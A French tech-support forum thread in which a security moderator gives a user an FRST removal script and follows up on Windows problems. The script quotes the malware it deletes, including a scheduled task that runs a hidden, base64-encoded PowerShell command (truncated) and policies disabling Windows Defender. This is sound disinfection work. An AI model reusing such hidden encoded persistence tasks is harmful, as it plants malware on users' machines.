Powershell.exe et analyse FRST
Fermébazfile Messages postés 56309 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 3 novembre 2024 - 14 juil. 2022 à 22:10
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4 réponses
Modifié le 14 juil. 2022 à 21:27
Bonjour.
Tu as deux antivirus en protection résidente sur ton pc (Avira et Sophos) c'est trop, il ne faut jamais avoir deux antivirus actifs sur le même pc il y a risque de forts ralentissements pouvant aller jusqu'au blocage du pc, en plus cela ne sert strictement à rien la preuve ton pc est infecté.
Pour supprimer l'infection présente sur ton pc fait ce qui suit :
Procédure à faire dans l'ordre indiqué :
1- Ouvre FRST en tant qu'administrateur pour cela avec le bouton droit de ta souris sur FRST et choisis exécuter en tant qu'administrateur
2 - Copie l'intégralité du script qui est dans l'encadré qui suit :
Start::
CreateRestorePoint:
CloseProcesses:
GroupPolicy-Firefox: Restriction
HKLM\SOFTWARE\Microsoft\Windows Defender: [DisableAntiSpyware] Restriction
HKLM\SOFTWARE\Microsoft\Windows Defender: [DisableAntiVirus] Restriction
HKU\S-1-5-21-1190838289-1289758029-4087865598-1001\...\Run: [Rave] => "C:\Users\lenyb\AppData\Local\Programs\rave-desktop\Rave.exe" --hidden (Pas de fichier)
Task: {E36E09B9-1B34-4207-97AF-F8A0B014A28B} - System32\Tasks\chrome view => cmd /c powershell -WindowStyle Hidden -E "CgAKAAoAJABqAGQAIAA9ACAAJABuAHUAbABsADsACgAkAGoAcAA9ACQAbgB1AGwAbAA7AAoACgAkAGEAcwBjAEUAbgBjAFQAeAB0AD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoACgBmAHUAbgBjAHQAaQBvAG4AIABnAGUAdABJAHQAZQBtACgAWwBzAHQAcgBpAG4AZwBdAC (l'élément de données a 4995 caractères en plus).
Edge Extension: (Pas de nom) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [non trouvé(e)]
Edge Extension: (Pas de nom) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [non trouvé(e)]
Edge Extension: (Pas de nom) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [non trouvé(e)]
Edge Extension: (Pas de nom) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [non trouvé(e)]
Edge Profile: C:\Users\lenyb\AppData\Local\Microsoft\Edge\User Data\cId=128000000001363769&path= [2022-07-11]
Edge DefaultProfile: Default
Edge HKLM-x32\...\Edge\Extension: [caiblelclndcckfafdaggpephhgfpoip]
U4 mhyprot2; C:\Users\lenyb\AppData\Local\Temp\mhyprot2.sys [1334824 2022-01-25] (Microsoft Windows Hardware Compatibility Publisher -> )
HKU\S-1-5-21-1190838289-1289758029-4087865598-1001\...\Run: [PlariumPlay] => D:\Games\Raid Shadow Legends\Plarium\PlariumPlay\PlariumPlay --args -run-with-os (Pas de fichier)
HKU\S-1-5-21-1190838289-1289758029-4087865598-1001\...\Run: [Dashlane] => "C:\Users\lenyb\AppData\Roaming\Dashlane\Dashlane.exe" autoLaunchAtStartup (Pas de fichier)
HKU\S-1-5-21-1190838289-1289758029-4087865598-1001\...\Run: [Rave] => "C:\Users\lenyb\AppData\Local\Programs\rave-desktop\Rave.exe" --hidden (Pas de fichier)
U3 aswbdisk; pas de ImagePath
S3 cpuz149; \??\C:\Users\lenyb\AppData\Local\Temp\cpuz149\cpuz149_x64.sys [X] <==== ATTENTION
S3 cpuz150; \??\C:\WINDOWS\temp\cpuz150\cpuz150_x64.sys [X]
S3 netprotection_network_filter2; System32\drivers\netprotection_network_filter2.sys [X]
AlternateDataStreams: C:\WINDOWS\system32\9EarsSurroundSound.dll:97D88723C8 [3314]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer1.log:F107EE40EF [3314]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer1.log_backup1:2DD1EC5C91 [3314]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer10.log:CCC93B07B0 [3314]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer10.log_backup1:AD433BF298 [3314]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer11.log:72C8986B20 [3314]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer11.log_backup1:97A90964FA [3314]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer12.log:C40F6B9209 [3314]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer12.log_backup1:7CC29836A6 [3314]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer13.log:AE3C879266 [3314]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer13.log_backup1:AF8AA3CDC1 [3314]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer14.log:DE1448F4D7 [3314]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer14.log_backup1:D61270D3FD [3314]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini:B1DA6C571C [3314]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Digital Editions 4.5.lnk:88797FF0B7 [3314]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Audacity.lnk:09A0A90EF3 [3314]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DAEMON Tools Lite.lnk:073005E2F7 [3314]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DAEMON Tools Lite.lnk:35EB56C735 [3314]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini:41964AA945 [3314]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epic Games Launcher.lnk:BE32D07BC5 [3314]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk:980850BA8A [3314]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GIMP 2.10.22.lnk:963589C917 [10]
AlternateDataStreams: C:\Users\lenyb\Application Data:a71eda622791298bf432424e2ed8fdad [394]
AlternateDataStreams: C:\Users\lenyb\AppData\Roaming:a71eda622791298bf432424e2ed8fdad [394]
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [6228]
SearchScopes: HKU\S-1-5-21-1190838289-1289758029-4087865598-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
FirewallRules: [{3ECEC5CE-6750-4006-9C76-9F4FA08BB56F}] => (Allow) D:\Programmes\Ubisoft Game Launcher\games\Tom Clancy's Rainbow Six Siege\rainbowsix_be.exe => Pas de fichier
FirewallRules: [{2F293B45-72AB-409D-80CC-AFB56F7E3517}] => (Allow) D:\Programmes\Ubisoft Game Launcher\games\Tom Clancy's Rainbow Six Siege\rainbowsix_be.exe => Pas de fichier
FirewallRules: [{B10A2128-65E4-45DC-93E6-F8E97045FB69}] => (Allow) D:\Programmes\Ubisoft Game Launcher\games\Tom Clancy's Rainbow Six Siege\RainbowSix.exe => Pas de fichier
FirewallRules: [{40578837-44BC-4FFA-B74E-71C05456831E}] => (Allow) D:\Programmes\Ubisoft Game Launcher\games\Tom Clancy's Rainbow Six Siege\RainbowSix.exe => Pas de fichier
EmptyTemp:
End::
3- Une fois le script copié clique sur Corriger, FRST prend automatiquement le script qui est dans le presse-papier.
Laisse la correction se faire une fois qu'elle est terminée il te sera demandé de redémarrer ton pc, fait-le dès que cela te sera demandé, voir ci-dessous.
Puis une fois ton ordinateur redémarré :
4- Tu auras un fichier Fixlog sur ton bureau ensuite envoie ces rapports sur https://www.cjoint.com/ voir ce tutoriel puis donne le lien généré par Cjoint dans ton prochain message.
IMPORTANT:
5- Réinitialise Google Chrome https://support.google.com/pixelslate/answer/3296214?hl=fr-CA
6- VÉRIFIE ET DIS-MOI SI TON PROBLÈME EST TOUJOURS PRÉSENT
Pour information.
Ta version de Windows 10 n'est pas à jour, pour le vérifier va sur cette page clique sur Mettre à jour maintenant, cela lancera le téléchargement de l'outil de Microsoft, il suffira de l'ouvrir et il te permettra de mettre à jour Windows 10 vers la dernière version et te dira si elle est compatible avec ton pc, attention cette mise à jour dure un certain temps.
Merci beaucoup pour votre réponse.
Bien compris pour l'antivirus !
Voici le fixlog : https://www.cjoint.com/c/LGosYZP20Wy
Je réinitialise Google Chome et je vous tiens au courant.
14 juil. 2022 à 21:21
J'ai malheureusement un nouveau problème.
Je voulais aller dans le panneau de configuration pour désinstaller un des deux antivirus, mais je n'arrive plus écrire dans la barre de recherche du menu démarrer.
Il me semble que ce problème est survenu après la correction.
Merci d'avance
14 juil. 2022 à 21:34
Ce la m'étonnerai que ce soit la correction vu qu'elle ne touche rien à ce niveau, met à jour Windows 10 comme indiqué à la fin de mon premier message cela devrait rétablir les choses.
Très bien je suis en pleine mise à jour.
Merci énormément pour votre réactivité et votre patience
14 juil. 2022 à 22:10
Pour info pour désinstaller un logiciel sous Windows 10 on ne passe pas par le panneau de configuration il y a une autre méthode plus simple il faut passer par les paramètres de Windows 10 voir cette page.